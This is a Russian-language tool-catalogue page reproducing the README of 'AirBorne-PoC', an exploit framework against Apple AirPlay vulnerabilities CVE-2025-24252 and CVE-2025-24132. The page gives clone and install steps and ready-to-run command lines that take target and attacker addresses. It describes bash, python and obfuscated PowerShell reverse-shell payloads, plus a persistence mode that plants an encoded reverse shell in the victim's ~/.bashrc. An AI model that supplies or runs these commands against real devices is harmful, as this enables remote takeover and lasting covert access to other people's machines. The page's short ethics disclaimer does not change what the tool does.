Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
AirBorne-PoC — poc for CVE-2025-24252 & CVE-2025-24132 | Kitploit
Инструменты/GitHubGitHub/ekomssavior/airborne-poc
Persistence MechanismsVulnerability AnalysisExploitationShellcodePost-ExploitationCommand and ControlRemote Access ToolPayload DevelopmentBinary Exploitation
GitHubekomssavior/airborne-poc

AirBorne-PoC

poc for CVE-2025-24252 & CVE-2025-24132

164277 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

Фреймворк AirBorne PoC – Elite RCE Edition

Полный PoC-фреймворк для CVE-2025-24252 и CVE-2025-24132
Автор ekomsSavior |

AirBorne — это комбинированный фреймворк PoC, нацеленный на две серьезные уязвимости в сервисе Apple AirPlay. Он включает в себя полный триггер сбоя и рабочую обратную оболочку с опциональной персистентностью, слушателем и несколькими форматами полезных нагрузок — всё в одном скрипте.

Ищете оригинальную версию?
Устаревшая версия все еще доступна в ветке legacy этого репозитория.
Чтобы переключиться на нее:

root@kitploit:~
git checkout legacy

Рассматриваемые CVE

CVE-2025-24252 – Сбой записи mDNS TXT

  • Вызывает сбой демона AirPlayReceiver с помощью некорректного mDNS-пакета
  • Работает через UDP broadcast на порту 5353

CVE-2025-24132 – Переполнение кучи → Обратная оболочка (RCE)

  • Вызывает переполнение кучи в TCP-сервисе AirPlay на порту 7000
  • Поддерживает полезные нагрузки обратной оболочки bash, python и PowerShell
  • Включает опциональную персистентность с помощью инъекции в .bashrc (Linux)

Начало работы

1. Клонирование репозитория

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. Установка зависимостей

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

Инструкция по запуску

Единственный скрипт airborne.py включает оба PoC и всю логику:

  • Выберите CVE с помощью --exploit
  • Установите полезную нагрузку обратной оболочки с помощью --payload
  • Автоматически запускает слушатель netcat
  • Опционально включает персистентность на цели с помощью --persistent

Примеры использования

Сбой цели с помощью mDNS-пакета (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

Требуется интерфейс в режиме монитора.


Запуск переполнения кучи → RCE (CVE-2025-24132)

Запуск полного эксплойта с оболочкой bash по умолчанию:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

Выберите оболочку Python вместо этого:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

Включите реальную персистентность на целях Linux:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

Только инъекция команд оболочки:

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

Варианты полезных нагрузок

Полезная нагрузкаОписание
bashОбратная оболочка bash по умолчанию через TCP
pythonОбратная оболочка на Python с использованием socket и

Режим персистентности

При использовании --persistent скрипт добавит закодированную полезную нагрузку обратной оболочки в:

root@kitploit:~
~/.bashrc

Это гарантирует, что оболочка будет возвращена вам каждый раз, когда пользователь входит в систему или запускает терминал.


Замечания по эксплуатации

  • Обратные оболочки кодируются с помощью base64 и доставляются после переполнения буфера
  • Все полезные нагрузки отправляются через порт 7000
  • mDNS-пакеты передаются через UDP 5353 и требуют разрешения на raw-сокеты
  • Убедитесь, что IP-адрес вашей атакующей машины доступен для целевого устройства
  • Скрипт обрабатывает основные ошибки и молча завершается, если порты закрыты

Этическое предупреждение

Этот проект предназначен только для образовательных, этических и авторизованных исследований.

  • Вы должны иметь явное разрешение на тестирование целевой системы.
  • Вы берете на себя полную ответственность за любые предпринятые действия.

Несанкционированная эксплуатация систем незаконна и неэтична.


Авторы

  • Разработано ekomsSavior
  • Вдохновлено реальными CVE и исследованиями разработки эксплойтов
Скачать инструмент
pty
powershellПолная полезная нагрузка RCE для Windows PowerShell (обфусцирована)